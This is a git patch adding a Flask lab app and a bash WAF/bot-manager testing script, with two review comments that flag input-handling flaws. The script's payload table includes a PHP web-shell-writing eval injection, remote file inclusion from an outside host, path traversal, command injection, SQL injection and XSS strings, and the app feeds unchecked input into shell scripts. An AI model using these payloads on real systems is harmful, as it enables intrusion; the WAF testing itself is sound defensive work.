From e0a4535e49e41d5ed8c2b9768e7c4b63cfb3fa8c Mon Sep 17 00:00:00 2001 From: Sangmin Kim Date: Tue, 19 Mar 2024 21:59:18 +0900 Subject: [PATCH] flask --- app/.DS_Store | Bin 6148 -> 6148 bytes app/flask/.DS_Store | Bin 0 -> 6148 bytes app/flask/app.py | 69 ++++ app/flask/scripts/bm.conf | 13 + app/flask/scripts/generate.sh | 10 + app/flask/scripts/mychecker.sh | 555 ++++++++++++++++++++++++++++++ app/flask/scripts/replaceImage.sh | 15 + app/flask/scripts/replaceVideo.sh | 15 + app/flask/templates/bm.html | 79 +++++ app/flask/templates/ivm.html | 241 +++++++++++++ 10 files changed, 997 insertions(+) create mode 100644 app/flask/.DS_Store create mode 100644 app/flask/app.py create mode 100644 app/flask/scripts/bm.conf create mode 100644 app/flask/scripts/generate.sh create mode 100644 app/flask/scripts/mychecker.sh create mode 100644 app/flask/scripts/replaceImage.sh create mode 100644 app/flask/scripts/replaceVideo.sh create mode 100644 app/flask/templates/bm.html create mode 100644 app/flask/templates/ivm.html diff --git a/app/.DS_Store b/app/.DS_Store index 219c73ffb0169abc412ad2c4a47650efacc9f5fe..886c4e92391d9c2f7a48099bb3ad6f8ce1bea115 100644 GIT binary patch delta 64 zcmZoMXfc@JFT%pWz`)4BAi%(ool=~fla!yI!#FWfLjoku%8FY@6F-P=X6N|J4*-X82`c~q diff --git a/app/flask/.DS_Store b/app/flask/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..b19deb3ae39a413a90d2388585b5100e9a4a4ec8 GIT binary patch literal 6148 zcmeHKyG{c^3>-rw649ij++W}iPEqm&`~Z+pARP+gLVq2<&G-RIbV*Br#*#g|UfZjk z;(P{RtIyp%ummutI^xUCRQ%j^B3I>cw5aip1BTtO?VtCP=<^QGy}^JjKJbd8{C)2U z3l@CA8xMLs#k$Jp@%ftaiUBbo2E>3E5CfMPV9$1$-zLh60Wly3ei`uZL!&x&g=1oT zI%r}9AkOFx;W}msVsi(vD;yK)p;)F8Gu3LuuuP}FRa{p%CT2P;Zf2dj*=j#u@O!a lt(X|Cm>X}!cSmu}*F5hE$HYjdKhlZ%5pZ54V&E?r_y(i~94Y_+ literal 0 HcmV?d00001 diff --git a/app/flask/app.py b/app/flask/app.py new file mode 100644 index 0000000..9d47bb8 --- /dev/null +++ b/app/flask/app.py 
@@ -0,0 +1,69 @@
+# This is the Flask app.py file that runs a web server and returns "Hello World"
+from flask import Flask, request, render_template
+import subprocess
+app = Flask(__name__)
+
+doc_root = '/root/origin-33/flask/scripts'
+
+@app.route('/lab/bm',methods = ['GET'])
+def bm():
+ return render_template('bm.html')
+
+@app.route('/lab/ivm',methods = ['GET'])
+def ivm():
+ return render_template('ivm.html')
+
+@app.route('/lab/bm/run',methods = ['GET'])
+def bm_run():
+ property = request.args.get('property')
+ property = str(property)
+ print(property)
+ script = f'{doc_root}/mychecker.sh'
+ args = ['-c', f'{doc_root}/bm.conf', property]
+ output = subprocess.check_output ([script] + args, shell=False)
+ output = output.decode('utf-8')
+ print (output)
+ output = output.splitlines()
+ return output
+
+@app.route('/lab/ivm/generate',methods = ['GET'])
+def ivm_generate_image():
+ property = request.args.get('property')
+ property = str(property)
+ print(property)
+ script = f"{doc_root}/generate.sh"
+ args = [property]
+ output = subprocess.check_output ([script] + args, shell=False)
+ output = output.decode('utf-8')
+ print (output)
+ output = output.splitlines()
+ return output
+
+@app.route('/lab/ivm/replace_image',methods = ['GET'])
+def ivm_replace_image():
+ property = request.args.get('property')
+ property = str(property)
+ print(property)
+ script = f"{doc_root}/replaceImage.sh"
+ args = [property]
+ output = subprocess.check_output ([script] + args, shell=False)
+ output = output.decode('utf-8')
+ print (output)
+ output = output.splitlines()
+ return output
+
+@app.route('/lab/ivm/replace_video',methods = ['GET'])
+def ivm_replace_video():
+ property = request.args.get('property')
+ property = str(property)
+ print(property)
+ script = f"{doc_root}/replaceVideo.sh"
+ args = [property]
+ output = subprocess.check_output ([script] + args, shell=False)
+ output = output.decode('utf-8')
+ print (output)
+ output = output.splitlines()
+ return
output
+
+if __name__ == '__main__':
+ app.run()
diff --git a/app/flask/scripts/bm.conf b/app/flask/scripts/bm.conf
new file mode 100644
index 0000000..291b83b
--- /dev/null
+++ b/app/flask/scripts/bm.conf
@@ -0,0 +1,13 @@
+#! /bin/bash
+#
+# For information about the configuration options use:
+# ./checker.sh -m
+#
+# Format example:
+# bms p GET https://www.akamai.com / krs-cmd
+bms s GET http://$1.akamai-lab.com / aka-arb
+bms s GET http://$1.akamai-lab.com / aka-seo
+bms s GET http://$1.akamai-lab.com / aka-eco
+bms s GET http://$1.akamai-lab.com / tra-ikb
+bms s GET http://$1.akamai-lab.com / tra-hbt
+bms s GET http://$1.akamai-lab.com / act-cok
diff --git a/app/flask/scripts/generate.sh b/app/flask/scripts/generate.sh
new file mode 100644
index 0000000..efb846c
--- /dev/null
+++ b/app/flask/scripts/generate.sh
@@ -0,0 +1,10 @@
+#! /bin/bash
+
+cd /usr/share/nginx/html/learn
+cp cream.png.bak $1_dog.png
+echo cream > $1_dog.txt
+echo $1'_newDog: cream'
+
+cp globe.mp4.bak $1_video.mp4
+echo globe > $1_video.txt
+echo $1'_newVideo: globe'
\ No newline at end of file
diff --git a/app/flask/scripts/mychecker.sh b/app/flask/scripts/mychecker.sh
new file mode 100644
index 0000000..775e83d
--- /dev/null
+++ b/app/flask/scripts/mychecker.sh
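Review bot: The `property` query parameter reaches the shell scripts unchecked in all four run handlers of app.py (`bm_run`, `ivm_generate_image`, `ivm_replace_image`, `ivm_replace_video`). `shell=False` with an argv list keeps it out of a shell command line at this layer, but the scripts added in the same commit expand it unquoted into file names and a hostname, and `str(None)` turns a missing parameter into the literal string `None`. I would reject anything that is not a single hostname label (which is what its use in `http://$property.akamai-lab.com` suggests it is meant to be) before any script runs, and fold the four near-identical bodies into one helper with a timeout, as sketched below; the sketch needs `re` and flask's `abort` imported. As far as this file shows, these routes write files and send traffic on an unauthenticated GET, so if the lab host is reachable by anyone else, POST plus an access check is worth adding. The header comment still says the app returns "Hello World", which no route does.

```python
_PROPERTY_RE = re.compile(r'[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?')

def _property_arg():
    # The value ends up in file names and in a hostname, so accept one
    # lowercase hostname label and nothing else (a missing parameter fails too).
    value = request.args.get('property', '')
    if not _PROPERTY_RE.fullmatch(value):
        abort(400)
    return value

def _run_script(name, *args):
    # Fixed script path, argv list (no shell), bounded run time; tune the timeout
    # to the slowest script.
    output = subprocess.check_output([f'{doc_root}/{name}', *args],
                                     shell=False, timeout=300)
    return output.decode('utf-8').splitlines()

@app.route('/lab/bm/run', methods=['GET'])
def bm_run():
    return _run_script('mychecker.sh', '-c', f'{doc_root}/bm.conf', _property_arg())

# … the three ivm_* run handlers become the same one-line call with their own script name …
```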
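Review bot: `$1` is expanded unquoted into the file names in generate.sh (`cp cream.png.bak $1_dog.png`, `echo cream > $1_dog.txt`), so an argument containing whitespace, glob characters or `/` changes which files are read and written. replaceImage.sh and replaceVideo.sh do the same with `$1_dog.txt` and `$1_video.txt`, and their `[ $oldDog = 'cream' ]` style tests break with a syntax error when the state file is missing or empty. Quote every expansion, e.g. `cp cream.png.bak "${1}_dog.png"`, and check the argument at the top of each script, e.g. `[[ $1 =~ ^[a-z0-9-]+$ ]] || exit 1`, so the scripts stay safe even when called from somewhere other than the Flask app. None of the three checks the result of `cd`; `cd /usr/share/nginx/html/learn || exit 1` keeps a failed directory change from writing into the caller's working directory.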
@@ -0,0 +1,555 @@ +#! /bin/bash +function logo() +{ + echo " _ _ " + echo " | | | | " + echo " ___| |__ ___ ___| | _____ _ __ " + echo " / __| '_ \ / _ \/ __| |/ / _ \ '__|" + echo "| (__| | | | __/ (__| < __/ | " + echo " \___|_| |_|\___|\___|_|\_\___|_| v1.0" + echo "" +} +function help() +{ + logo + echo "Welcome! This script aims to ease the testing of WAF Application Controls, Bot Manager Standard and Bot Manager Premier" + echo "Please check the information below in order to configure the proper parameters." + echo + echo "checker.sh -c [] -r [] -v -e -d -m" + echo "" + echo "-c Configuration file. Check default.conf inside 'conf' folder for more information or use the -m option" + echo "" + echo "Optional:" + echo "-r Identifier added to the referer header to filter in WSA." + echo "-v Verbose mode." + echo "-e Export results to a CSV file." + echo "-d Use DNS lookup instead of hard-coded Edge IPs (use with caution, resolvers could block your IP if too much tests)." + echo "-m Print manual." 
+ echo "" +} +function helpconf() +{ + logo + echo "This script reads a configuration file that uses the following 6 block of data per line:" + echo "" + echo "[type] [environment] [method] [URL] [path] [arguments(optional)]" + echo "" + echo "Examples:" + echo "atg p GET http://www.{akamaized domain}.com / krs-cmd" + echo "bms s GET http://www.{akamaized domain}.com / aka-arb" + echo "bmp p POST http://www.{akamaized domain}.com / foo=bar" + echo "man s GET http://www.{akamaized domain}.com /?foo=bar" + echo "man p POST http://www.{akamaized domain}.com / foo=bar" + echo "" + echo "Available options:" + echo "--------------------------------------------------------------------------------------" + echo "type The type of control that will be tested, options are:" + echo " atg -- WAF Attack Groups" + echo " bms -- Bot Manager Standard" + echo " bmp -- Bot Manager Premier" + echo " man -- Manual test" + echo "environment Destination of the request to be generated, options are:" + echo " s -- Staging environment" + echo " p -- Production environment" + echo "method Method expected on Akamai for the tested URL, options are: GET or POST" + echo "url URL to test, the protocol (http or https) needs to be used" + echo "path Path to test (use / if no specific path)" + echo "arguments For atg:" + echo " krs-cmd -- Command Injection" + echo " krs-xss -- Cross-Site Scripting" + echo " krs-dos -- DDOS" + echo " krs-iht -- Invalid HTTP" + echo " krs-php -- PHP Injection" + echo " krs-rfi -- Remote File Inclusion" + echo " krs-sql -- SQL Injection" + echo " krs-trj -- Trojan" + echo " aag-wat -- Web Attack Tool" + echo " aag-wpr -- Web Protocol Attack" + echo " aag-sql -- SQL Injection" + echo " aag-xss -- Cross-Site Scripting" + echo " aag-lfi -- Local File Inclusion" + echo " aag-rfi -- Remote File Inclusion" + echo " aag-cmi -- Command Injection" + echo " aag-wpl -- Web Platform Attack" + echo " penalty -- Penalty test (no attack)" + echo " For bms:" + echo " aka-arb -- 
Academic or Research Bots" + echo " aka-asc -- Automated Shopping Cart and Sniper Bots" + echo " aka-bib -- Business Intelligence Bots" + echo " aka-eco -- E-Commerce Search Engine Bots" + echo " aka-eag -- Enterprise Data Aggregator Bots" + echo " aka-fia -- Financial Account Aggregator Bots" + echo " aka-fis -- Financial Services Bots" + echo " aka-job -- Job Search Engine Bots" + echo " aka-mda -- Media or Entertainment Search Bots" + echo " aka-new -- News Aggregator Bots" + echo " aka-onl -- Online Advertising Bots" + echo " aka-rss -- RSS Feed Reader Bots" + echo " aka-seo -- SEO, Analytics or Marketing Bots" + echo " aka-sit -- Site Monitoring and Web Development Bots" + echo " aka-soc -- Social Media or Blog Bots" + echo " aka-war -- Web Archiver Bots" + echo " aka-wse -- Web Search Engine Bots" + echo " tra-ikb -- Impersonators of Known Bots" + echo " tra-dvf -- Development Frameworks" + echo " tra-htl -- HTTP Libraries" + echo " tra-wsl -- Web Services Libraries" + echo " tra-osc -- Open Source Crawlers/Scraping Platforms" + echo " tra-hbt -- Headless Browsers/Automation Tools" + echo " tra-dcb -- Declared Bots (Keyword Match)" + echo " tra-agc -- Aggressive Web Crawlers" + echo " tra-req -- Request Anomaly" + echo " act-cok -- Cookie Integrity Failed" + echo " For bmp:" + echo " List of body parameters used by the endpoint (if any)" + echo " For man:" + echo " If using POST, list of body parameters" +} +function readconfig +{ + if [ $verbose -eq 1 ]; then echo -e "> reading configuration"; fi + while IFS=' ' read -ra line || [ -n "$line" ]; + do + [[ "$line" =~ ^(#.*|^$)$ ]] && continue + for i in "${line[@]}"; do + test_string+=("$i") + done + if [ $verbose -eq 1 ]; then echo -e "> ${test_string[0]} ${test_string[1]} ${test_string[2]} ${test_string[3]} ${test_string[4]} ${test_string[5]}"; fi + test_string[3]='http://'$property'.akamai-lab.com' + # echo $test_string[3] + protocol="" + sleepsec=5 + if [[ ${test_string[3]} =~ ^http:// ]]; + then + 
host=${test_string[3]:7}; + protocol=${test_string[3]:0:4}; + fi + if [[ ${test_string[3]} =~ ^https:// ]]; + then + host=${test_string[3]:8}; + protocol=${test_string[3]:0:5}; + fi + + if [[ $host == '' ]]; then + echo "Oops... did't find any valid protocol." + exit + fi + env="" + if [[ ${test_string[1]} == 'p' ]]; then + env="Production" + if [[ $protocol == 'http' ]]; then resolve 1; fi + if [[ $protocol == 'https' ]]; then resolve 2; fi + elif [[ ${test_string[1]} == 's' ]]; then + env="Staging" + if [[ $protocol == 'http' ]]; then resolve 3; fi + if [[ $protocol == 'https' ]]; then resolve 4; fi + else + echo "Oops... not a valid environment." + exit + fi + test_string=() + if [ $verbose -eq 1 ]; then echo -e "> sleeping for 5 seconds..."; fi + sleep $sleepsec + done < "$filecnf" +} +function resolve() +{ + xpass=0 + if [[ $1 == 1 ]]; then + if [[ $PFIP == '' ]]; then + dig="dig +short $PFFQ | tail -n1" + PFIPi=$(eval $dig) + if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$PFIPi]"; fi + else + if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $PFIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi + if [[ $xpass == 1 ]]; then + iparray=(${PFIP//:/ }) + PFIPi="${iparray[$RANDOM % ${#iparray[@]}]}" + fi + if [ $verbose -eq 1 ]; then echo -e "> Cache used [$PFIPi]"; fi + fi + curl $PFIPi + elif [[ $1 == 2 ]]; then + if [[ $PEIP == '' ]]; then + dig="dig +short $PEFQ | tail -n1" + PEIPi=$(eval $dig) + if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$PEIPi]"; fi + else + if ! 
[[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $PEIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi + if [[ $xpass == 1 ]]; then + iparray=(${PEIP//:/ }) + PEIPi="${iparray[$RANDOM % ${#iparray[@]}]}" + fi + if [ $verbose -eq 1 ]; then echo -e "> Cache used [$PEIPi]"; fi + fi + curl $PEIPi + elif [[ $1 == 3 ]]; then + if [[ $SFIP == '' ]]; then + dig="dig +short $SFFQ | tail -n1" + SFIPi=$(eval $dig) + if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$SFIPi]"; fi + else + if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $SFIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi + if [[ $xpass == 1 ]]; then + iparray=(${SFIP//:/ }) + SFIPi="${iparray[$RANDOM % ${#iparray[@]}]}" + fi + if [ $verbose -eq 1 ]; then echo -e "> Cache used [$SFIPi]"; fi + fi + curl $SFIPi + elif [[ $1 == 4 ]]; then + if [[ $SEIP == '' ]]; then + dig="dig +short $SEFQ | tail -n1" + SEIPi=$(eval $dig) + if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$SEIPi]"; fi + else + if ! 
[[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $SEIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi + if [[ $xpass == 1 ]]; then + iparray=(${SEIP//:/ }) + SEIPi="${iparray[$RANDOM % ${#iparray[@]}]}" + fi + if [ $verbose -eq 1 ]; then echo -e "> Cache used [$SEIPi]"; fi + fi + curl $SEIPi + fi +} +function exportcsv() +{ + if [ $verbose -eq 1 ]; then echo -e "> exporting .csv"; fi + export_payload="" + export_type="" + for i in ${!ACRONYMA[@]}; do + if [[ ${test_string[5]} == ${ACRONYMA[$i]} ]]; then export_payload=${ACRONYMB[$i]}; fi + if [[ ${test_string[0]} == ${ACRONYMA[$i]} ]]; then export_type=${ACRONYMB[$i]}; fi + done + if [[ ${test_string[0]} == 'bmp' ]]; then export_payload=${test_string[5]}; fi + echo "${env},${http},${epoch},${refe},$export_type,$export_payload,${URL}" >> "$(basename ${filecnf})_${filetim}.csv" +} +function payload +{ + PARAMHOLDER="?id=1" + HEADERHOLDER1="" + HEADERHOLDER2="" + HEADERHOLDER3="" + rules=(${1//:/ }) + for i in ${!rules[@]}; do + case ${rules[$i]} in + "950002") PARAMHOLDER+="&p=powershell.exe"; ;; + "950006") PARAMHOLDER+="&p=chmod.40%2B1x.traceroute"; ;; + "950011") PARAMHOLDER+="&p=%3C%21--%23printenv"; ;; + "950103") HEADERHOLDER1+="p: ..%2F..%2F..%2F..%2F"; ;; + "950907") PARAMHOLDER+="&p=wget"; ;; + "3000005") PARAMHOLDER+="&p=%2Fsbin%2Fping"; ;; + "3000007") PARAMHOLDER+="&p=%3B+head+%2Fusr%2Ftemp+%3E+my.f"; ;; + "3000012") PARAMHOLDER+="&p=action%3Anew+java."; ;; + "3000013") PARAMHOLDER+="&p=wget+https%3A%2F%2Fmy.site"; ;; + "3000014") PARAMHOLDER+="&p=%24%7B.openstream()."; ;; + "3000020") PARAMHOLDER+="&p=%2Fproc%2Fself%2Fenviron"; ;; + "3000023") PARAMHOLDER+="&class%5B%27classLoader%27%5D%5B%27resources%27%5D%5B%27dirContext%27%5D%5B%27docBase%27%5D%3D%2F%2F192.168.18.1%2Ffile.do"; ;; + "3000025") PARAMHOLDER+="&p=()%20%7B.4654"; ;; + "3000031") HEADERHOLDER2+="Range: 18446744073709551615"; ;; + "3000033") 
PARAMHOLDER+="&p=phar%3A%2F%2F%20zlib%3A%2F%2F%20glob%3A%2F%2F%20expect%3A%2F%2F%20jar%3A%2F%2F"; ;; + "3000034") PARAMHOLDER+="&p=Runtime.getRuntime("; ;; + "3000041") PARAMHOLDER+="&p=%24class.inspect(%20type.getruntime(freemarker.template.utility.execute"; ;; + "3000056") PARAMHOLDER+="&p=o%3A5%3A%5C%22456%5C%22%3A546%3A%7Ba%3B%7D"; ;; + "3000058") PARAMHOLDER+="&p=action%3A%24%7B"; ;; + "3000065") H10="Content-Type: text/xml"; DATAHOLDER='%3Ccommand%3Ejava.lang.processbuilder$nullinputstream\ncom.sun.xml.internal.ws.encoding.xml.xmlmessage$xmldatasource\njavax.crypto.cipherinputstream\njavax.crypto.nullcipher\n\njava.lang.processbuilder%24nullinputstream%5Cn%0Dcom.sun.xml.internal.ws.encoding.xml.xmlmessage%24xmldatasource%5Cn%0Djavax.crypto.cipherinputstream%5Cn%0Djavax.crypto.nullcipher%5Cn%0D%3Cclassfactory%3E'; ;; + "3000068") PARAMHOLDER+="&p=%3Cesi%3Ainclude"; ;; + "3000072") H10="Content-Type: application/octet-stream"; DATAHOLDER='*.exec(* *burpcollaborator* *ysoserial* *freddy?*http:*.20java.%2Fio%2Ffile%20java%2Flang%2Fruntime.123'; ;; + "950018") PARAMHOLDER+="&p=http%3A%2F%2Fwww.test.com%2Ftest.pdf%20x0d%23"; ;; + "958000") PARAMHOLDER+="&p=.addimport"; ;; + "958001") PARAMHOLDER+="&p=document.exitFullscreen%5D"; ;; + "958002") PARAMHOLDER+="&p=.execscript"; ;; + "958003") PARAMHOLDER+="&p=.fromcharcode"; ;; + "958004") PARAMHOLDER+="&p=.innerhtml"; ;; + "958005") PARAMHOLDER+="&p=%3C!%5Bcdata%5B"; ;; + "958006") PARAMHOLDER+="&p=%3Cbody%20background"; ;; + "958007") PARAMHOLDER+="&p=%3Cbody%20onload"; ;; + "958008") PARAMHOLDER+="&p=%3Cinput%20type%20image"; ;; + "958009") PARAMHOLDER+="&p=%40import"; ;; + "958010") PARAMHOLDER+="&p=activexobject"; ;; + "958011") PARAMHOLDER+="&p=background-image%3A"; ;; + "958012") PARAMHOLDER+="&p=copyparentfolder"; ;; + "958013") PARAMHOLDER+="&p=createtextrange"; ;; + "958016") PARAMHOLDER+="&p=getparentfolder"; ;; + "958017") PARAMHOLDER+="&p=getspecialfolder"; ;; + "958018") 
PARAMHOLDER+="&p=href%20javascript%3A"; ;; + "958019") PARAMHOLDER+="&p=href%20shell%3A"; ;; + "958020") PARAMHOLDER+="&p=href%20vbscript%3A"; ;; + "958022") PARAMHOLDER+="&p=livescript%3A"; ;; + "958023") PARAMHOLDER+="&p=lowsrc%20javascript%3A"; ;; + "958024") PARAMHOLDER+="&p=lowsrc%20shell%3A"; ;; + "958025") PARAMHOLDER+="&p=lowsrc%20vbscript%3A"; ;; + "958026") PARAMHOLDER+="&p=mocha%3A"; ;; + "958027") PARAMHOLDER+="&p=onabort"; ;; + "958028") PARAMHOLDER+="&p=settimeout%20("; ;; + "958030") PARAMHOLDER+="&p=src%20http%3A"; ;; + "958031") PARAMHOLDER+="&p=src%20javascript%3A"; ;; + "958032") PARAMHOLDER+="&p=src%20shell%3A"; ;; + "958033") PARAMHOLDER+="&p=src%20vbscript%3A"; ;; + "958034") PARAMHOLDER+="&p=style%3Dbexpression("; ;; + "958036") PARAMHOLDER+="&p=type%20application%20x-javascript"; ;; + "958037") PARAMHOLDER+="&p=type%20application%20x-vbscript"; ;; + "958038") PARAMHOLDER+="&p=type%20text%20ecmascript"; ;; + "958039") PARAMHOLDER+="&p=type%20text%20javascript"; ;; + "958040") PARAMHOLDER+="&p=type%20text%20jscript"; ;; + "958041") PARAMHOLDER+="&p=type%20text%20vbscript"; ;; + "958045") PARAMHOLDER+="&p=url%20javascript%3A"; ;; + "958046") PARAMHOLDER+="&p=url%20shell%3A"; ;; + "958047") PARAMHOLDER+="&p=url%20vbscript%3A"; ;; + "3000036") PARAMHOLDER+="&foo&msg=bar"; ;; + "950116") PARAMHOLDER="%ufF12/"; ;; + "950107") PARAMHOLDER="%00%!%u1234/?id=1"; ;; + "950108") H10="Content-Type: application/x-www-form-urlencoded;charset=test"; DATAHOLDER='%00%!%u1234/'; ;; + "950109") PARAMHOLDER+="&p=%2500%25!%25u1234"; ;; + "958230") HEADERHOLDER1="Range: 50-10 bytes=10-,10-,10-,10-,10-,"; ;; + "958231") HEADERHOLDER1="Range: bytes=10-,10-,10-,10-,10-,"; ;; + "958291") HEADERHOLDER1="Range: bytes=0-"; ;; + "958295") HEADERHOLDER1="Connection: keep-alive,close"; ;; + "960006") H9="User-Agent;"; ;; + "960007") H6="Host;"; ;; + "960008") H6="Host:"; ;; + "960009") H9="User-Agent:"; ;; + "960010") HEADERHOLDER1="Content-Type: application/x-www-checker"; 
;; + "960011") HEADERHOLDER2="Content-Length: 1000"; ;; + "960012") HEADERHOLDER2="Content-Length:"; ;; + "960016") HEADERHOLDER2="Content-Length: checker"; ;; + "960022") HEADERHOLDER1="Expect: 100-continue"; PROTOCOLHOLDER="--http1.0"; ;; + "960034") PROTOCOLHOLDER="--httpX.X"; ;; + "960038") HEADERHOLDER1="Content-Range: test"; ;; + "960901") PARAMHOLDER+="&one=more"; ;; + "960902") HEADERHOLDER3="Content-Encoding: Identity"; ;; + "958976") PARAMHOLDER+="¤t={pboot:if(eval\($_GET\['a'\]))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyd4YiddKTsgPz54YnNoZWxs'));"; ;; + "958977") PARAMHOLDER+="&p=allow_url_include%3D%20safe_mode%3D%20suhosin.simulation%3D%20disable_functions%3D%20open_basedir%3D%20auto_prepend_file%3D%20php%3A%2F%2Finput"; ;; + "959151") PARAMHOLDER+="&p=%3C%3F%3C%3F"; ;; + "3000003") PARAMHOLDER+="&p=base64_decode("; ;; + "3000016") PARAMHOLDER+="&p=data%3Atext%2Fplain%3Bbase64%2C"; ;; + "950117") PARAMHOLDER+="&p=https%3A%2F%2F123.123.123.123"; ;; + "950118") PARAMHOLDER+="&p=mosConfig_absolute_path=GALLERY_BASEDIR%3Dhttps%3A%2F%2F%5B%5E%5Cs%5D%2B"; ;; + "950119") PARAMHOLDER+="&p=https%3A%2F%2F${test_string[3]}%3F"; ;; + "950120") PARAMHOLDER+="&referer=GALLERY_BASEDIR%3Dhttps%3A%2F%2F%5B%5E%5Cs%5D%2B"; ;; + "950001") PARAMHOLDER+="&p=dbms_java"; ;; + "950007") PARAMHOLDER+="&p=attnotnull"; ;; + "950901") PARAMHOLDER+="&p=%22test%3C%3D%3E%22test"; ;; + "950908") PARAMHOLDER+="&p=coalesce"; ;; + "959070") PARAMHOLDER+="&p=create%20table%27%20statements%20(e.g.%20%27create%20table%20("; ;; + "959071") PARAMHOLDER+="&p=%27%20OR%20%27string%27%20%3C"; ;; + "959072") PARAMHOLDER+="&p=AND%20%27string%27%3D"; ;; + "959073") PARAMHOLDER+="&p=select%27...%27length%27...%27from%27%2C%20%27select%27...%27count%27...%27from%27%2C%20%27sp_sqlexec%27%2C%20%27group%27...%27by%27...%27having"; ;; + "981172") 
COOKIEHOLDER="p=%27...%27length%27...%27from%27%2C%20%27select%27...%27count%27...%27from%27%2C%20%27sp_sqlexec%27%2C%20%27group%27...%27"; ;; + "950110") HEADERHOLDER1="x_file: test"; ;; + "950921") PARAMHOLDER="/scri%E2%80%8Cpts/root.exe&/c+dir"; ;; + "watatomic") PARAMHOLDER="/bbscan-404-existence-check?id=1&msg=legion"; UAHOLDER+=" absinthe"; HEADERHOLDER1="acunetix-aspect: 1"; HEADERHOLDER2="nstealth_xss: nstealth_xss"; ;; + "wpratomic") HEADERHOLDER1="Content-Type: application/xml"; HEADERHOLDER2=" Transfer-Encoding: checker"; HEADERHOLDER3="Content-Length: chunked"; ;; + "sqlatomic") PARAMHOLDER+="&fakeparam=-1%20UNION%20ALL%20SELECT%20%40%40version%2C2%2C3--"; ;; + "xssatomic") PARAMHOLDER+="&fakeparam=%3Cscript%3Ewindow.alert(%221213%22)%3C%2Fscript%3E&f2=PHNjcmlwdD5hbGVyd"; ;; + "lfiatomic") PARAMHOLDER+="&fakeparam=.././.././../etc/passwd"; ;; + "rfiatomic") PARAMHOLDER+="&fakeparam=http://cirt.net/rfiinc.txt"; ;; + "cmiatomic") PARAMHOLDER+="&fakeparam=something;/bin/whoami"; ;; + "wplatomic") HEADERHOLDER1+="Range: 18446744073709551615"; ;; + *) PARAMHOLDER="" ; ;; + esac + done +} +function curl +{ + shopt -s nocasematch + if [[ ${test_string[2]} =~ ^(GET|POST)?$ ]]; then + if [ $verbose -eq 1 ]; then echo -e "> using ${test_string[2]}"; fi + if ! 
[[ ${test_string[2]} =~ ^(GET)?$ ]]; then method="-X ${test_string[2]}"; else method=""; fi + COOKIEHOLDER="" + HEADERHOLDER1="Connection: keep-alive" + HEADERHOLDER2="" + PARAMHOLDER="" + PATHHOLDER="" + DATAHOLDER="{'foo':'bar'}" + UAHOLDER="" + PROTOCOLHOLDER="--http2" + if [ -z "$fileref" ]; then + epoch=$(date +%s); + else + epoch=$fileref; + fi + H1="Accept: application/json" + H2="Accept-Encoding: gzip;q=1.0, compress;q=0.5" + H3="Accept-Language: en-US,en;q=1.0" + H4="Cache-Control: no-cache" + H5="Cookie: foo=bar;" + H6="Host: $host" + H7="Origin: ${test_string[3]}" + H8="Referer: $epoch" + H9="User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36 opr/checker" + H10="Content-Type: text/plain" + if [ ${test_string[0]} = 'atg' ]; then + if [ $verbose -eq 1 ]; then echo -e "> Attack Group (atg) found"; fi + case ${test_string[5]} in + "krs-cmd") payload "950002:950006:950011:950103:950907:3000005";; + "krs-xss") payload "950018:958000:958001:958002:958003:958004:958005:958006:958007:958008:958009:958010:958011:958012:958013:958016:958017:958018:958019:958020:958022:958023:958024:958025:958026:958027:958028:958030:958031:958032:958033:958034:958036:958037:958038:958039:958040:958041:958045:958046:958047"; ;; + "krs-dos") payload "3000036"; ;; + "krs-iht") payload "950107:950108:950109:958291:958295:960010:960016:960022:960038:960901:960902"; ;; + "krs-php") payload "958976:958977:959151:3000003:3000016"; ;; + "krs-rfi") payload "950117:950118:950119:950120"; ;; + "krs-sql") payload "950001:950007:950901:950908:959070:959071:959072:959073:981172"; ;; + "krs-trj") payload "950110:950921"; ;; + "aag-wat") payload "watatomic"; ;; + "aag-wpr") payload "wpratomic"; ;; + "aag-sql") payload "sqlatomic"; ;; + "aag-xss") payload "xssatomic"; ;; + "aag-lfi") payload "lfiatomic"; ;; + "aag-rfi") payload "rfiatomic"; ;; + "aag-cmi") payload "cmiatomic"; ;; + "aag-wpl") payload "wplatomic"; ;; + 
"penalty") payload ""; ;; + *) echo -e 'Oops... invalid argument!'; exit; ;; + esac + elif [ ${test_string[0]} = 'bms' ]; then + if [ $verbose -eq 1 ]; then echo -e "> Bot Manager Standard (bms) found"; fi + case ${test_string[5]} in + "aka-arb") UAHOLDER+=" lightspeedsystems"; ;; + "aka-asc") HEADERHOLDER1+="X-HONEY-BOT:Hi_HC_Aegah4luquud8ahVOchood5a"; ;; + "aka-bib") UAHOLDER+=" companybooknetworking.com"; ;; + "aka-eco") HEADERHOLDER1="X-HONEY-BOT:Hi_PC_uNeini4aphaiB1oiChoh1thi"; ;; + "aka-eag") UAHOLDER+=" shrinktheweb.com"; ;; + "aka-fia") UAHOLDER+=" (moneyforward)"; HEADERHOLDER1="X-MF-Tag:12345678"; ;; + "aka-fis") UAHOLDER+=" drwholdings.com"; ;; + "aka-job") UAHOLDER+=" motorelavoro.it"; ;; + "aka-mda") UAHOLDER+=" localconditions.com"; ;; + "aka-new") UAHOLDER+=" reader.aol.com"; ;; + "aka-onl") UAHOLDER+=" integralads.com"; ;; + "aka-rss") UAHOLDER+=" pocketcasts.com"; ;; + "aka-seo") UAHOLDER+=" terrykyleseoagency.com"; ;; + "aka-sit") 